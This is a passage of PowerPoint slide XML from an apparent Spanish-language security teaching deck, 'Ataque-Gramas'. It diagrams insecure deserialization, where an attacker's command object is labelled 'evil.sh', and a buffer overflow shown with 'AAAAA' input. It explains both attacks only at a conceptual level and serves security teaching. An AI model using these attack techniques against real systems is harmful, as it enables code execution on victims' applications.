              <a:rPr lang="es-UY" b="1" dirty="0"/>
              <a:t>Deserialización Insegura</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3668B87-6FBE-DE42-A6BA-834C1B23918A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3" cstate="screen">
            <a:alphaModFix amt="53000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="80810" t="32962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2723746" y="1567361"/>
            <a:ext cx="1371683" cy="1666426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C38FC0AF-91A6-3C40-877E-CCEF69A30155}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2037493" y="4613935"/>
            <a:ext cx="1050542" cy="1217929"/>
            <a:chOff x="1267225" y="4514012"/>
            <a:chExt cx="1050542" cy="1217929"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Graphic 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8946F9A6-DF3D-E840-93F6-FB4FE5FFBE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7601" y="4514012"/>
              <a:ext cx="952500" cy="952500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="TextBox 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75AE18CF-923F-B14E-8685-05A6FEB55251}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1267225" y="5424164"/>
              <a:ext cx="1050542" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="es-UY" dirty="0"/>
                <a:t>Atacante</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Curved Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A69D79DD-5599-A14B-B897-D12006D7ADBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="0"/>
            <a:endCxn id="4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2276779" y="3481127"/>
            <a:ext cx="1380148" cy="885469"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="C0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69CB740-A901-5543-BDCD-476BE2ED9A79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2806922" y="1240377"/>
            <a:ext cx="1736373" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sistema de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Librería</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Graphic 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA788ECB-1243-7D45-8C39-4DDBC6432557}"/>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088035" y="2468462"/>
            <a:ext cx="481538" cy="494646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Rectangle 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E64D24A-A263-2B47-9840-83D81685C37D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9462347" y="2971520"/>
            <a:ext cx="1565654" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;_ evil.sh</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="64" name="Graphic 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0923061-8275-6746-BBFC-83A9C2E1D3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06493" y="3782554"/>
            <a:ext cx="574890" cy="574890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{721DF1C7-EBA2-D743-BCF8-4F3D3CC427E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3902535" y="4389593"/>
            <a:ext cx="1707519" cy="1442271"/>
            <a:chOff x="1345136" y="3444526"/>
            <a:chExt cx="1707519" cy="1442271"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Graphic 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B122F76F-F9BA-5441-A3B1-F0B9F3D9C47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45136" y="3444526"/>
              <a:ext cx="952500" cy="952500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="Graphic 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BBAFDB9-FAD4-0A43-AF69-9B02F9976F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80575" y="3627856"/>
              <a:ext cx="952500" cy="952500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="TextBox 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93433081-5A63-BC4B-9B6D-9651E5A49B4B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1345136" y="4579020"/>
              <a:ext cx="1707519" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="es-UY" dirty="0"/>
                <a:t>Usuarios Comunes</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{525C85E3-28AC-224D-A834-9B429D7C2297}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1380195" y="4389536"/>
            <a:ext cx="960519" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Objeto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Comando</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="Curved Connector 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E1A5538-F591-B747-B811-49D8FA8FB749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="25" idx="0"/>
            <a:endCxn id="4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="3316284" y="3327091"/>
            <a:ext cx="1155806" cy="969197"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="65000"/>
                <a:lumOff val="35000"/>
                <a:alpha val="56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E76D4CE3-4BEB-D240-BCC9-392C35D4675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54048" y="3549830"/>
            <a:ext cx="872851" cy="872851"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C27D80FF-70FD-DF41-943A-5F146FAE669C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4946269" y="4323189"/>
            <a:ext cx="721672" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Objeto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Libro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAEC2F28-16D7-0A41-B47A-3516E8DDB345}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6665214" y="1103006"/>
            <a:ext cx="4559808" cy="4893647"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0"/>
              <a:t>Los ataques de deserialización apuntan a aplicaciones que aceptan objetos en formato binario o texto. Para que el ataque sea posible, la aplicación debe referenciar clases inseguras que ejecutan código cuando se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0" err="1"/>
              <a:t>deserializa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0"/>
              <a:t> el objeto en memoria. Desafortunadamente, muchas de las bibliotecas de terceros más comunes incluyen estos tipos de clases.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Google Shape;91;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91A47D62-29C9-3CBD-EE46-049E9C36CB23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186475" y="335525"/>
            <a:ext cx="15594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Y" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Ataque-Gramas</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="16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700907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2BF45-1B79-6DCE-73C5-979BE857BC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A7451-F85B-FBBC-CDCF-18EE1872F10A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2279122" y="294343"/>
            <a:ext cx="9726403" cy="549275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Buffer Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA8E5D12-46C5-DDE5-BD8F-A6DF8DD06F68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6170250" y="1894959"/>
            <a:ext cx="6021750" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t>Los ataques de buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1"/>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t> permiten a los atacantes cruzar las barreras de los espacios de memoria de las variables y modificar el código y la ejecución de los programas.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;91;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CE1A4B5-AAA3-46C5-5FBD-A371F060D958}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186475" y="335525"/>
            <a:ext cx="15594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Y" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Ataque-Gramas</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Google Shape;564;p32" descr="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF063114-E752-D97F-C1B4-E6DB3D976F7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="52999"/>
          </a:blip>
          <a:srcRect l="80810" t="32962" r="2089" b="37636"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3086016" y="2258436"/>
            <a:ext cx="2026713" cy="2462207"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Google Shape;565;p32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D3D960D-660B-75C5-6E11-DEA5D9333725}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="752743" y="3013289"/>
            <a:ext cx="994449" cy="1279444"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="994447" cy="1279442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="Google Shape;566;p32" descr="Graphic 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53AD7A81-D248-F687-2B70-8A49A34CB741}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="952500" cy="952500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Google Shape;567;p32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91C66BF4-0960-BB73-1377-6A1F627B93FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="35344" y="910152"/>
              <a:ext cx="959103" cy="36929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chemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Atacante</a:t>
              </a:r>
              <a:endParaRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Google Shape;568;p32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B36F93E-148A-FDC4-75B9-941A57575D63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1574862" y="3501736"/>
            <a:ext cx="1794921" cy="112763"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="21600"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21600" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="44450" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="C00000">
                <a:alpha val="55686"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="8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sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Google Shape;569;p32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D0C2AB4-737F-2A20-C983-C05B2A17B39A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676614" y="3066748"/>
            <a:ext cx="1001016"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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>AAAAA</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Google Shape;570;p32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C717A900-FE1B-E9CE-2D1A-094F58458BC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3550107" y="1894959"/>
            <a:ext cx="1003026"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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Programa</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Google Shape;571;p32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{700D706B-5403-1944-DCBF-ECA66E753637}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3554283" y="2865123"/>
            <a:ext cx="970544" cy="64629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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>b = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>AAAA</a:t>
            </a:r>
